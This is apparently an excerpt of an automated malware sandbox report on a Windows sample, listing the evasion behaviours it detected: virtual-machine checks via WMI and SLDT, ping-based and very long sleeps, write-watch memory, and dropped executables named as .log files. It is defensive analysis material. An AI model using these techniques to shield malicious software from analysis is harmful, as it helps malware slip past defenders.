Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

46_2_00000001400010C0

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\PerfDll\hyperProviderSavesinto.exe	Memory allocated: EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Memory allocated: 1ABB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Memory allocated: 1350000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Memory allocated: 1AEE0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Memory allocated: 1AE00000 memory reserve \| memory write watch

Contains functionality to detect virtual machines (SLDT)

Source: C:\PerfDll\hyperProviderSavesinto.exe

Code function: 8_2_00007FFD9BC493F1 sldt word ptr [eax]

8_2_00007FFD9BC493F1

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599812
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599425
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599292
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 599094
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598729
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598125
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 598012
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597672
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597546
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597437
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597273
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597171
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 597056
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596804
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596662
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596542
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596434
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596327
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596218
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596108
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 596000
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595890
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595781
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595628
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595515
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595406
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595296
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595187
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595077
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594968
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594859
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594750
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594638
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594530
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594421
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594311
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594203
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594093
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593984
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593875
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593765
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593656
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593465
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593324
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593216
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593099
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592979
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592867
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592762
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3989	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5804	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Window / User API: threadDelayed 3527
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Window / User API: threadDelayed 6318
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 8408
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 1449
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 2545
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 7455

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XVmuemSr.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\phOzxInG.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LugVktua.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IkSFhrpY.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kEwbgeKe.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vsaRQqFM.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KEMGRwnV.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zQhPhksn.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\msAjSsFc.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WiKMUFpI.log	Jump to dropped file

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\conhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\PING.EXE	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\conhost.exe	API coverage: 4.7 %
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	API coverage: 5.0 %
Source: C:\Windows\System32\conhost.exe	API coverage: 4.7 %
Source: C:\Windows\System32\PING.EXE	API coverage: 5.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 3989 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 5804 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7200	Thread sleep count: 105 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7200	Thread sleep time: -105000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599812s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599425s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599292s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599094s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598729s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598234s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598125s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598012s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597672s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597546s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597437s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597273s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597171s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597056s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596804s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596662s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596542s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596434s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596327s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596218s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596108s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595890s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595781s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595628s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595515s >= -30000s
